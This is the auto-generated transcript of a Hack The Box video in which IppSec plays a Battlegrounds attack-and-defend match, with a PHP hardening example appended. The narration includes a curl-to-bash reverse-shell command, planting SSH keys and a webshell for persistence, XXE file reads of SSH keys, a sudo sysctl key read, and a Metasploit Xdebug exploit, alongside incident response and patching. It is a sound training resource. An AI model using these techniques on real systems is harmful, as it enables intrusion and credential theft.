Hack The Box Hacking Battlegrounds - Cyber Mayhem Gameplay with Ippsec

Captions
What's going on, YouTube? This is IppSec, and thanks to Hack The Box for introducing Battlegrounds. We not only get a chance to do some live hacking, but we also get to respond to other people hacking us in real time, trying to figure out how they got onto a box and then patching the vulnerability to hopefully prevent them from getting back on at a later time.

But before we do anything, there are three quick things I want to go over. First, as of recording this video, this mode is only available to VIP and VIP+ members. That's not to say it's always going to stay that way, but right now it requires a subscription that's either 10 pounds or 13 US dollars per month, which actually is a steal when you consider it also gives you access to over 150 retired machines and walkthroughs, and also the Pwnbox, which is a Parrot VM in the cloud that you can access via your browser. So I would highly recommend getting VIP if you are not already one.

Secondly, the platform is treated like active boxes. Please do not stream or post videos of these boxes until Hack The Box provides further guidance. I know a lot of people would benefit highly from watching these types of videos, but the game may not be fun after all the videos and walkthroughs of the machines go out, because people would start going and having auto-patching scripts, which just absolutely kills this game mode. I know Hack The Box wants to allow streaming, and hopefully that comes soon, but as of right now please do not stream any machine. I know there are going to be machines shown in this video, but it's coming from Hack The Box on Hack The Box's YouTube channel, not my YouTube channel.

Lastly, this feature is currently in beta. New features and machines are still being added pretty frequently, so the platform you see in this video may not line up exactly with what you see on the page.

So with all that being said, let's get started. To access the Battlegrounds, just go to the Hack The Box website, and then on the left side there's going to be this
Battlegrounds link. Click it and then click Play. This view brings you to the dashboard where you can see all the various game modes. Right now only Cyber Mayhem is available, which is a four versus four attack and defend game that takes one hour to play. So I'm going to click on Play Battleground, select the match type I want, which again, only Cyber Mayhem is available, so I'll click Find Match.

Then, while we wait, we can check out the How to Play, which is going to have frequently asked questions on the right, like "do you need to form a team?" The answer is no, you do not. You can play by yourself or be joined by two or three other friends. If you go by yourself it will just auto-match you with people until it gets to four versus four. The game won't start until there's eight people in the queue.

There's also some rules down the middle here, such as: please don't shut down machines; also, do not change the root password, every machine gets a unique root password. There are health checks to make sure people are playing fairly, so those health checks begin with HTB=1 in the process. Please do not kill those processes, and also please don't use that HTB=1 in your own attack stuff and try to fool people into thinking that's a health check script, because that's just unfair. Speaking of unfair, do not create a script that just randomly goes out and kills reverse shells. Anyone can do that. The trick is to actually learn how to patch things, because that's going to make you a better blue teamer, and if you're a better blue teamer you're also going to be a better red teamer. Number one, you'll know how to get around certain patches, and number two, if you put better mitigations in your report it's going to make it feel like it just isn't copy and paste from Nessus or something. It's going to make your approach so much better if, instead of "don't let me do a reverse shell", you say "hey, if you had PHP in safe mode it may have blocked my reverse shell, first sent you
an alert, and then you would have had time to respond to me before I just pound your whole environment." So definitely always learn how to patch things, because knowing blue helps tremendously. I came from a blue background and I think it's probably what makes me such a strong attacker.

Defenders also aren't supposed to kill an entire service; instead, try to patch the vulnerability. So what that means is, if you see a vulnerable website, don't just go and kill Apache. Instead, go through the source code and try to put the patch in. So maybe you'll go through a PHP app, see it's using eval, and switch that to something like file_get_contents. There's a bunch of other rules, definitely go read them while you're in the queue.

But more so, while we wait I'm going to go through my general workflow. As you know I'm a huge tmux fan, so I have a few panes here. We have a server, a blue, a Metasploit and an attack pane, and by the end of the event everything's chaos, so it's probably going to get up to like ten up here.

My server tab, number one, I use this one for my VPN. When Battlegrounds starts everyone gets a unique VPN file, so that's what this tab is for. Then right below it I put my pane that's going to have a web server. I don't have that launched right now because every Battlegrounds I create a new www directory to try to stay somewhat clean, and that's based off this www-skele directory. So if I go in here we can see I have a few files: I have my public key, then linpeas, then this php-rev, which is just the laudanum script that's hard-coded to have this IP address that will be changed when we generate a new directory. If you don't have the laudanum script, it's probably in /usr/share/laudanum/php/php-reverse-shell.php. I remove these comments so the IP's near the top, because it just makes it a bit quicker to make sure everything's working. And then the final script I have in here is setup.sh, and this is just what I run once I root a box. It's going to make sure the .ssh directory
exists and then put my public key into the authorized_keys file, and also drop a cute little webshell in /var/www/html in case they try to get me off and don't do proper cleanup.

This directory is used with a script I created which is called, let's see, start-bg, and what this does is it's going to copy www-skele to just www, it's going to run sed to replace the IP address with the IP address I specify, and it's copying the laudanum shell to a few different files that I have found to be helpful. These three are just different attack vectors. I didn't want to remember exactly how many characters I need for this one to generate every time, so I just copy the file so I always have it ready to go. This is a WordPress one, obviously. This is just one if I want to be cute again, it's all phprev.php. And then I have a one-liner, so this is just going to put the bash command inside of shell.sh, and then we have this one that's going to put a base64 version in case I have to get around bad characters or something. So that is the bg script.

I always have a blue pane, and what this is is just a way to quickly access my castles. So I have hbg.sh, and this is using sshpass to get into a box. The second argument's going to be the password, and then we've got these -o's. This is going to eliminate the SSH host key file, because all the castles get generated every game, so you can have a lot of IPs get reused, which is going to make your SSH life hell if you don't add these -o's. To use this I just do like ./hbg, the IP address, and then a password, and this SSHes me into the castle.

The last script I have is a get-flags. This is going to go through every castle that I have an SSH key on and print out the flag, so if they haven't cleaned me up, this just makes it really quick to re-get the flags whenever they rotate. So BatchMode is going to say only do SSH public key files, never accept a password. If I don't have that, then when I run the script and I come
across the castle that my host key's not there, the script's going to pause and ask me for a password, so this gets rid of that. Then of course you've got the disabling of host keys, and then it's using my private key, and here's the command: root@10.10.10.110 and then the IP address, and it's going to cat root.flag, or yeah, root flag.txt, put a line break, then cat /opt/flag.txt and put a line break. So that's super simple.

There is a Metasploit tab, and all I do here is a sudo msfdb run. I know a lot of people don't like Metasploit, but keep in mind this is a timed event, so any time you waste trying to get a GitHub page or something working, you're wasting time getting a flag, and you may waste that time during a flag rotate and miss out on points for that round. So always do things as efficiently and quickly as possible, and Metasploit is that. Additionally, Metasploit may help you hide a bit better from a defender, because you probably won't have this python3 -c 'import pty' process being spawned if you're using Metasploit, which a defender may see.

There is also the attack pane. This is just where I will do all my reverse shells from at the beginning. Again, I create like five panes after this because it just gets such a mess. So that's about it. I guess there's one more thing I do: if you do use Firefox in the same pane you're going to be attacking from, I'd highly recommend going into Burp Suite, going into the Proxy, the Options, and then under Intercept Client Requests click on Add and say IP address is in range of 10.10.110.100 to 10.10.110.120.
And then also disable WebSockets in Burp Suite, because I don't think any boxes right now utilize WebSockets, but this website does. What we're doing here is making sure that when we refresh this page, or submit flags, Burp Suite doesn't intercept it, because it's going to slow you down so much if you have this page in the background constantly sending requests going into your Burp Suite, stopping you from intercepting something to, like, 10.10.110.101. So we can try this: let's see, 10.10.110, let's try .102, Ctrl+Shift+R because this is just in my cache right now. We have to go actually to Burp Suite, send this in, and we can see now this page is being intercepted. Let's drop this request, go back to Hack The Box, Ctrl+Shift+R, and we don't see Hack The Box being intercepted. So this is good.

Since we are still waiting for a match, what we can do is, I guess, kind of go over some things I do once I get on a box, and go over this setup. So I'm going to do start-battleground 127.0.0.1 to get started, and then we can go into the www directory, and if I do a less on shell.sh you can see the IP address was magically changed to 127.0.0.1. If we look at the please-subscribe one, you can see that IP address was also changed.

So let's say I get on a box or I find a command injection vulnerability. What is the first thing I'm going to do? Well, I'm going to say, hey, run the command curl 127.0.0.1 (of course this is going to be like a 10.10.14.x) /shell.sh and pipe it over to bash, and what that's going to do is send me a reverse shell. And then from here, of course, I'm going to do python3 -c 'import pty; pty.spawn("/bin/bash")', then I may go into a different directory, do some hacky things like go into please-subscribe and start doing things. At this point the defender may catch on, and one good thing I've always found running is ps -eaf --forest. This command's going to feel like magic, because it's going to print everything in a super nice tree, so you can trace one attack: who
did what. I'm launching this from bash; if this was a box this would probably be like apache2, some thread, and then you'd see it. But the really cool thing about this is you can go to the PID, the /proc directories of these processes. So if we go into, whoops, cd /proc/ and this PID, you get a bunch of files, the main key one being cwd. So if we do ls -la and grep for cwd, we can see where this shell is: /dev/shm/please-subscribe. You could also go into the file descriptors and cat these to see what they're seeing, or you can send them a message: if we echo "please subscribe to IppSec" to 0, let's see what happens here. I'm guessing it's going to appear right here, boom, so we sent this pane a message.

The other really cool thing about this, though, from a defender's side: we may not want to kill his shell yet. We may want to kind of see what he's doing or how he got on the box. A lot of these boxes have multiple paths. It may have an Apache server, may have a Tomcat server, may have an SSH key, may have SMB, there's a bunch of different ways to get on these boxes. So right here's where they launched Python and they went into a different bash, but right here is the bash that was set off by their reverse shell. So while ls -la /proc/579730 grep for cwd, well, this one says they're in /dev/shm/please-subscribe, this one's probably going to say something different. So if we do ls -la /proc/ this one, grep cwd, this is saying /home/ipsec/htbg, which is the directory we were in when we launched this command. So this can kind of give you a hint of what application to look at to figure out how they got on the box. If it's in Apache, of course go to the access logs, look at their IP address. So what I would do is do an ss -anp and grep for that PID, and hopefully I find it and can see what IP address they are, so I can go into the Apache log file and see the last thing they accessed. So yeah, I hope that becomes helpful. I'm going to wait for an actual queue and then we'll get in, do one box and
hopefully do incident response on one box. So let's close this out, and then go up one directory, rm -rf www, and now let's just wait in this queue.

So when you get this "match found", click Accept, and we have eight of eight people accepted, so the game should begin very shortly. Click on the "get ready", OK, for the get ready, and then we can see who's playing. So we've got DireGT, myself, ForJay and Felimos versus Sinfuls, Tobu, Egotistical and Marine. So let's just click on Download OVPN, and then I'm going to open this and we're going to copy this into a profile, so vi bg.conf. I'm going to delete everything here because this is an old Battlegrounds VPN that I don't need, and restart it, so openvpn bg.conf. And since we're here, we know I pasted it correctly, there's not an error message. I just like starting it because if there is, like if I put an extra character or something, or I don't copy everything, it's going to tell me. I thought it would tell me my file is bad. But get it started; it's not going to connect right away. You have to wait for the eight bars to go green, so that's down here. Once all eight of these go green then the VPN will turn on and you'll be brought to a place to access the castles. So I'm just going to wait here for these bars to go green and then we'll reconnect.

So all the bars are green. I'm going to go back to my VPN and we're going to reconnect, and hopefully we get the 10.10.14.2 address, because I feel that's just home field advantage. And we do not, we have 10.10.14.5. So what I'm going to do is start-bg 10.10.14.5, and that's going to build that www directory with everything I want. So let's go take a look at the new pane. We have four machines for each team. Again, these are the same machines per team, the idea being one is for you to log into and defend, the other for you to attack. Whenever I go to a page I also hit Ctrl+Shift+R to force a cache refresh, because this may show you something from the last game, so just do Ctrl+Shift+R every time, and we
get different portals. Come on, which one is this? Looks like Secure File Manager, and then what is this, something that says Method Not Allowed. So I'm going to go look at here, because this brings me right to a login form and I'm used to attacking login forms. So I'm going to click here and do Assign to Me, to tell the team I am working on this box, and then we can also Retrieve the Root Password. Now it just copied it to my clipboard, and oh man, someone's already pwned that. So let's go ./hbg.sh 10.10.110, and this one is .102 for us to log in and defend, paste that, and we get logged right in.

So let's go intercept this login request. My Burp Suite is on, going over to Firefox and going to this box, I'm going to try to log in with ippsec, root@ippsec.rocks, and the contact will be fives: three fives, three fives and four fives. Hopefully I did that correctly, and we're going to intercept this request. Go over to Burp Suite and we see something weird with this login request: "can't send temporary password to me". But this is XML, so we can do some type of XML entity injection most likely. So I'm going to say, oh man, Burp's in pretty print, sweet. So I'm going to do DOCTYPE root and then ENTITY test SYSTEM, and I'm just going to access /etc/passwd first to see if this is vulnerable. I think I did that correctly. So name ippsec, and for the email, since it's outputting the email here, this is where I'm going to put the test. And we can see this one line let us do that XML entity injection, and we have a list of all the users on this box, one of which being olivia. So the first thing I'm going to do, since this is the only user, is try accessing /home/olivia/.ssh/id_rsa to see if she has a key, which she does. So let's log in as olivia and see what we have. I'm going to go over to number three and we'll do vi olivia, paste the key, chmod 600 on the key, ssh -i olivia 10.10.110, ours or theirs, .106.
This is what I mean about having all those -o options. So we have to paste this thing to erase the key from us, log in, and I forgot to put olivia@, and we are in. I'm going to run w to see if there's any defenders on this box. I don't see any logins from root, so we should be good. sudo -l, and it wants us to have a password for olivia, so we can try seeing if we can find any passwords. I'm going to go to /var/www/html and see if I find any db.conf files. There is this process.php, and this looks like it's going to be something for where we sent our login request. So if we go back to our Burp, we did process.php, there's this line libxml_disable_entity_loader. I'm guessing if we change this to true it's going to fix the issue. So we may want to go over to a blue castle real quick, /var/www/html, go into process.php and change this one line to be true, so hopefully it's not vulnerable. We can test it once we get a shell, or I guess we could go back to Burp and say, .102, send it: "couldn't send temporary password". We can change that back to be false, save, and we get a password. So now we know we have patched the way we just got onto the box, as we're going along.

So going back to this attack pane, let's see, let's go into blog, and there is a config.php. If I look at blog here, would this have been a website? Looks like maybe, oh, we probably have to disable Burp Suite. Let's go to /blog, and it was a website, so this may also be vulnerable. There is a password here for olivia, and I could also go and grab flag.txt, but I don't do that right away because the person may come in and kick me off. We can do a w to see if anyone's logged in, and we're going to run this in a few seconds after I submit this to see if Egotistical comes and logs in to kick me off. So I'm going to paste this here, we'll see what he does, if anyone logs in, and we're going to try using this for my password. So sudo -l, paste this, and it looks like olivia may run a few commands, getvolt and sysctl. sysctl I
think has a GTFOBin, so I'm going to check that out. So GTFOBins, I'm going to do sysctl. If you're not familiar with that, I guess I can show it, not just going to the directory directly, so let's just do gtfobins.io, and then sysctl, click on sudo, and it looks like LFILE=file_to_read and then sudo sysctl and then the file. So I'm just going to grab this, paste, and we'll do /root/.ssh/id_rsa to see if the key's here. Looks like it is, so I'm going to grab this key and then go to a different pane. This box is called Adelbert, so adelbrt, I'm going to paste this, chmod 600 on this, ssh -i this to 10.10.110.106, I think, is the IP address, and we have to specify root, and we are on the box.

So now I can do curl 10.10.14, my IP is .5, /setup.sh, pipe it over to bash, and I never started my web server, so shame on me. sudo python3 -m http.server 80, and then run this again, and now if I just ssh -i ipsec root@10.10.110.106 it's going to log me in. If I run my get-flags it's going to go through each box, and this one I can log in. Let's do a w on this box to see if any defenders logged in. One did, he did not kick me off though. We could... oh no, that's me, never mind, that's not a defender, that is me, ignore.

So let's go take a look at our box to see if we can figure out how this person got on. So we patched the vulnerability we got in with. Looks like they have a different way to get in. So what I'm going to do is that ps -eaf --tree, is it tree? What was it, --forest. ps -eaf --forest, and I don't see any reverse shells, so they probably just did something to grab the flag. So it's probably like an LFI to grab /opt/flag.txt. Maybe they did the XML entity injection we're sitting on. So what we can do is cd /var/log/apache2 and then grep for 10.10.14 on access.log, and I am one IP address. What am I? I am .5, so I'm going to ignore anything with .5. It looks like we have two people here. Someone was doing the process, .7, so that's
probably a malicious person. They're trying that XML entity injection, but thankfully I patched it as I was going along and they can't get in. So whoever .5, .7 is, they are probably frustrated. Well, maybe not .5, because that is me. So whoever .7 is, they're not having a great day. Let's see, flag, so no one's trying to get the flag.

Let's see, let's try to go to 10.10.110.101 and see if anyone has a shell. So Retrieve Root Password, and I'm going to hbg 10.10.110.101, paste it, and I'm going to do the ps -eaf --forest, and do we see anything? Nothing looks out of the ordinary. So again, we don't have anyone having a shell on our equipment yet. So we can try /var/log/apache2, cat access.log, grep for 10.10.14, and a bunch of POST requests to just / from 10.10.14.2. So flag, so maybe there's something in a POST request for this. We could probably tcpdump them. Do we have tcpdump? Yeah, we could tcpdump and see exactly what they are doing, but I'm going to go and log into the other boxes, see if anyone has a shell and didn't submit anything. So let's go to hbg 10.10.110.103, paste, ps -eaf --forest, and let's see, Stuart, JBoss, doesn't look like anything suspicious. Let's try the last one, ps -eaf, we have to get into the box first, so Retrieve Root Password, ps -eaf, get into the box first, getting ahead of myself, paste this password in, ps -eaf --forest, and it doesn't look like we see anything.

We see someone editing index.php, that is one of our defenders. The issue with this, though, is he's using vi in /var/www/html. If we do ls -la, oh, I thought it was going to create a swap file. Is that still being edited? Let's see, ps -eaf, it is not. But when you do vi it's going to create a file.swp, and that may allow someone to see the source code of the file. So if you're accessing like db.php or something, definitely be careful with that, because if they access your swap file then, yeah, bad things will happen. So I guess we should just wait for someone to get a shell. ps -eaf --forest,
doesn't look like anything here. ps -eaf --forest, nothing here. Oh wait, we have a shell. We have a Python reverse shell from olivia here, so yep, this is legit. So let's go see what they're doing. If we go to cd /proc/3609, ls -la and grep cwd, they're currently in the blog, so chances are this is what they exploited, or they're grabbing the file for the password, so we may see them sudo very shortly. We can see where they landed by this one, so let's do cd /proc/3509, ls -la grep cwd. Looks like, yeah, it's the blog beforehand too, so I'm guessing they somehow exploited this blog. Was that the forest command? What I'm going to do is, I think this one will have the IP address, so ss -anp, grep 3437, and we can see this is 10.10.14.8 has a shell on port 4444. So what I'm going to do is go to /var/log/apache2 and we can grep for this IP on access.log, and we can see what they hit. So they did nothing really: GET on /js, images/test.jpg. Let's see, did they upload that test.jpg somehow? So /var/www/html, cd images, file test.jpg, looks like a JPEG. Install ImageMagick, so that's not how they got on.

We can do an ss -lnpt to look at all the open ports and see what there is. So we have Apache on 80, MySQL on 3306. MySQL, I honestly do not know. They are the olivia user, so they didn't SSH in. ps -eaf --forest, are they still in? They are. So let's see, grep olivia, ps -ef, maybe I misspelled olivia. See, olivia is running Apache, so ss -lnpt and grep on 3398. So I want to see what port this Apache is, make sure it is port 80. Let's see, maybe 2643, the parent process. So here we go, it is listening on port 80, so they got in over port 80. They had a command execution somehow and I didn't see them in /var/log, all right, yeah, /var/log/apache2.
So let's see, sometimes being defender is hard. So grep this on access logs and let's see: GET /, has owned, process.php, user flag, login.html, oh, maybe they did something. Was this a 404, getting /admin? Oh wait, this is 101, right? What box am I even on? This is 102. So this is this one. Not exactly sure how he got on, but let's see, doesn't have a root session. What we can do is ps -eaf --forest, and we're going to kill his session and run tcpdump. So I'm going to kill 3437. Round three, availability, that's no longer there. So we can go to /root, tcpdump, let's do ifconfig, tcpdump -i ens160, -p, we can just say, let's not do port 80, let's just, whoops, no, I need to specify an out file, crap, pkill tcpdump. Make sure he's not on the box before you do this; doesn't look like he is. -n, and maybe port not 22. Does that work? "The enemy has owned a user flag", oh crap, we just missed it. ps -eaf --forest, it's defunct. kill -9, let's do 3398, that may kill something I don't want. Hopefully we get the shell yet. Let's try -o, forgot the out file, tcpdump.cap, and I think -s0 so we capture everything, I forget the size. Oh well, we won't... what? That's -w for out file, or write file, -s0. So hopefully we capture them. If we see the root flag I'm going to download this capture and we will analyze it, and if someone else logs in I will go and take a look at exactly what happened. So I'm going to pause the video and just sit here until we see something.

Or actually, we can Retrieve Root Password and ./hbg 10.10.110.102, paste this. Up, what? See, grab Retrieve Root, looks like someone may have changed this password. Oh, I added an h to it somehow, OK. Both of those are me. ps -ef, I think -eaf --forest, and we see my tcpdump but we do not see any shells yet. Oh no, here's one as olivia, that could be the shell they already had. Let's see, kill -9 3608 and 3609. So I think they had a shell already on the box, so I don't
think I did a good job at getting them off. So always be careful how you kill, and always, always double, triple check. So let's go here, restart this capture, tcpdump2.cap, waiting for a shell. And we can also go into .ssh, cat authorized_keys, and I don't think this is... we'll do an ls -la: October 20th at 11:09. What is the date? 11:33, so like 20 minutes ago. I don't think it's been that long. So let's do another ps command and we don't see anything, so I'm just going to sit here and wait for another flag, and we'll go to the box and do an incident response, because I want to show a clean incident response of us doing something.

So someone got a user on this box, so let's go take a look at it. I'm going to retrieve the root password. We already got a session, I think it's this one. ifconfig, is this 103? That's 104. ifconfig, 103. ps -eaf --forest, and we see up here someone got on through JBoss, because we see this bash reverse shell as leo. So we know to look into JBoss to see exactly what they did. This is going to be a tough one to patch, probably, because I don't know Java that well, but we can try going into cd /opt/jboss, cd server, find ., maybe grep for jsp. So I'm actually not sure how to patch this one such that I'd be comfortable doing it live, or hunting for the vulnerability. So this shell, congratulations, you get to keep it. If I was doing this and not recording I'd be digging into this a lot more, but you can definitely see how this ps -eaf --forest command helps you find reverse shells.

While we're here, is anything here yet? I don't see a reverse shell on this one. Is there anything here? Nothing there, and nothing there. We can see if they cleaned us up. I'm going to run the get-flags again; if they haven't, I will just submit these two flags right away, and then we're going to sit and wait for them to pop something, because I really want to show a good incident response thing. So flags reset, and someone got a flag on 101 right away, so we're going to go take a look at that box to see if we can
figure out exactly how they got that user flag. So I think it's this, ifconfig, 101. If we go to /var/log, cd apache2, and probably just tail -10 on access.log and see what files are accessed. They're still doing this POST request to /, so let's go to /var/log, www, cd /var/www/html and look at index.php, because they're doing a POST request here. So they have some type of LFI. So we have this POST and url, and let's see where url is used. Let's see, first url equals nothing, out. So what I'm guessing this is, is this url is beginning with file and they're grabbing something. So let's go to 10.10.110.101 and we can see what this app is. They're probably doing like file:///opt/flag.txt, and that's how they're grabbing it. So they don't have a way to get a reverse shell; they can just include files off the server.

So let's go and patch that vulnerability real quick to make sure they don't get that flag again. Oh wait, it's this one again, that's Tomcat, I don't know how to troubleshoot that one. But let's see, we can probably change this to say if flag is in url then die. So let's go and search "php code if string is in variable", "see if string contains a specific word", awesome. So here we go, let's have some fun. Let's grab this, and foreach list as url, $_POST['url'] equals, that was it doing this, so file_get_contents. So here let's change this to be: is there a url variable? There is, $_POST['url']. Let's say $ipsec is equal to $_POST['url'], like this, and then do this: say url and has flag, and echo "not today, also subscribe to ippsec" and die. And then save this, and let's go back here and try this again. Oh, we forgot to change this flag to be ipsec, so this url should also be ipsec. Sorry, it's hard to do this and talk at the same time, but change this over to ipsec and print, and we got that one patched. So if that is like http it probably will say failed to connect url, so that is good. It's a file_get_contents, so if that was an eval I would stop http as well, but we have stopped whoever
that was from accessing that flag. If we wanted to add some jazz we could go to the battle log and look at Florida and see who took Florida. So let's see, Albert, so this is Ego taking that one. Where is Florida, team two? So instead of this I'm going to put "not today", and that is good.

So Albert, someone got this flag, so let's take a look at exactly what happened. Hopefully we have it in a tcpdump, and oh my god, did someone kill my connection? Let's do, let's see, scp 10.10.110.102, what was it, what did we call it? I'm going to call it du, and we will copy it to period. We'll probably have to get rid of this host key, yes, 102, put this back in, and we have to say root, tcpdump2.cap, is bringing in. So we can do wireshark tcpdump2.cap and hopefully we see how they got in. "Your team", so let's see, GET /blog. Do they have a shell on this box? "Availability check initiated". ps -eaf --forest, I do see a shell. So let's see, let's cat /opt/flag.txt and we're going to search our pcap for this string. So if we go here we can, via Ctrl+F, search this string, narrow and wide, packet bytes, will this find it? I thought this would work. Yeah, I guess that won't work. Packet details, nope. So what we probably have to do is pipe this over to something like, not Bro, Zeek. Zeek would be super helpful here. We can look at what port they're using, I think it was probably 4444, so ps -eaf --forest, let's go here and ss -anp, grep, they are connecting on 10.10.14.8 port 9000 and then 4444. So let's try tcp.port == 9000, 4444. I wonder if I'm in the wrong capture or maybe it just didn't capture it. See, we're in tcpdump2. Let's take a look at /var/log/apache2 again and we're going to look at this for 10.10.14.8, so grep 10.10.14.8 on access.log, and it doesn't look like anything else was hit. tail -f access.log, and let's go to 10.10.10.102.
I think I'm missing a piece to this puzzle. So let's see, /blog, was it blog? It shows flags have been replanted. Let's see, I'm going to look over at the blog and let's look at this request, send this, I want to send this over to Burp Suite, send to Repeater, go, and OK, it's got Xdebug running. So I was thinking this, because of the ways to pop a web server that will default to port 4444, and that is a Metasploit port, so whenever I see 4444 I think of Metasploit, and what probably happened is they used this exploit. So, "the enemy has already...", use 0, and we can do show options, set RHOST to tun0, set path /blog/index.php, and the default SRVPORT is also 9000, which is going to be good for us. So set LHOST to tun0, set RHOST to 10.10.110.102, run, and we can get on the box. So we have finally figured out what Ego's been doing, I think. ps -eaf --forest, let's see how I did it, what mine looks like. See, I don't see where Meterpreter is here. Again, Meterpreter is going to hide much, much better than Python stuff. Could be this right now, so it may have not loaded the second stage yet. Let's see, ps, let's go to /dev/shm and go over back to a blue, or go back to our server, I mean, yeah, blue, blue's what I want. Let's look at this one. So if this olivia process is in /dev/shm this is Meterpreter, this is Python. So let's see, ls -la /proc/26, grep -i cwd, nope, oh, 3149, I misclicked. So 3149, yep, this is my Meterpreter right here. So you can see it's definitely a bit stealthier. If we went into shell this will probably be a bit less stealthy, so we can do this, and then you can see here Meterpreter, and Meterpreter launching a shell. So again, always know your tools and kind of what they do. But let's go and patch this Xdebug thing. So let's go, I think it's vi /etc/php/php.ini, cd /etc, find . | grep php.ini, so vi /etc/php/7.0/apache2/php.ini, and is there a remote_host? remote_host is 127.0.0.1, let's
just try disabling x debug so service apache 2 restart so xdebug is enabled and what we can do now is kill his shell so pseaf dash dash forest and grab python uh i think he's off the box cd slash root ssh cat authorized keys i don't think anyone's changed this let's look at the date 1109 still psef dash dash forest um make sure i'm on the box 102 so i think ego left this box so hopefully we have kicked them off maybe when we restored it apache um it killed him we can check that out by going to interpreter material session one died so yes that worked trying to go run and it can't run anymore so looks like we have patched x debug and the next time a health check comes if we don't see losing points here we didn't interfere with the checker script and everything is good um i don't know how this one got owned what is a battle chat saying uh asking why flag is reset so yep that'll be the video hope you guys found this insightful take care and i will see you all next time
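The index.php patch discussed in the video, reconstructed as an added example that is not code from the video or the box: the vulnerable file_get_contents() of a POST url, the quick "flag" blocklist applied during the game, and a stronger scheme allowlist beside it. Function names and the sample inputs are constructed for this example.

```php
<?php
// Added example, not code from the video or the box. It reconstructs the pattern the
// transcript describes (index.php reads a POST 'url' with file_get_contents(), so a
// value such as file:///opt/flag.txt discloses a local file) and places the quick
// in-game patch next to a stronger check. Names and sample inputs are constructed.

// Vulnerable shape, as described in the video: whatever scheme the caller supplies is read.
function fetch_vulnerable(array $post): string { return (string) @file_get_contents($post['url'] ?? ''); }

// The in-game patch: refuse any url containing "flag". It stops the flag grab, but
// file:// reads of every other path on the server still go through.
function blocklist_allows(string $url): bool
{
    return stripos($url, 'flag') === false;
}

// Stronger fix: accept only well-formed absolute http(s) URLs, so file://, php://,
// data:// and bare paths are rejected before file_get_contents() ever runs.
// FILTER_VALIDATE_URL alone is not enough, since it accepts file: URLs with no host.
function allowlist_allows(string $url): bool
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Hardened handler: same "not today" response the video uses, plus a short timeout
// and no redirect following so the remote fetch cannot be steered elsewhere.
function fetch_hardened(array $post): string
{
    $url = $post['url'] ?? '';
    if (!allowlist_allows($url)) {
        return 'not today';
    }
    $ctx = stream_context_create(['http' => ['timeout' => 3, 'follow_location' => 0]]);
    return (string) @file_get_contents($url, false, $ctx);
}

// Constructed sample inputs; only the two checks are compared, nothing is fetched.
$samples = ['file:///opt/flag.txt', 'file:///etc/hostname', '/etc/hostname', 'https://example.org/'];
foreach ($samples as $url) {
    printf("%-30s blocklist:%-8s allowlist:%s\n", $url,
        blocklist_allows($url) ? 'allowed' : 'blocked',
        allowlist_allows($url) ? 'allowed' : 'blocked');
}
```

Running the script shows the difference the video glosses over: the blocklist only stops the one path containing "flag", while the allowlist rejects every local read regardless of name.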
Info
Channel: Hack The Box
Views: 95,233
Rating: 4.9600921 out of 5
Keywords: gaming, hacking, cyber security, cybersecurity, cyber mayhem, attack defense, battlegrounds, hacking games
Id: o42dgCOBkRk
Length: 56min 33sec (3393 seconds)
Published: Thu Oct 22 2020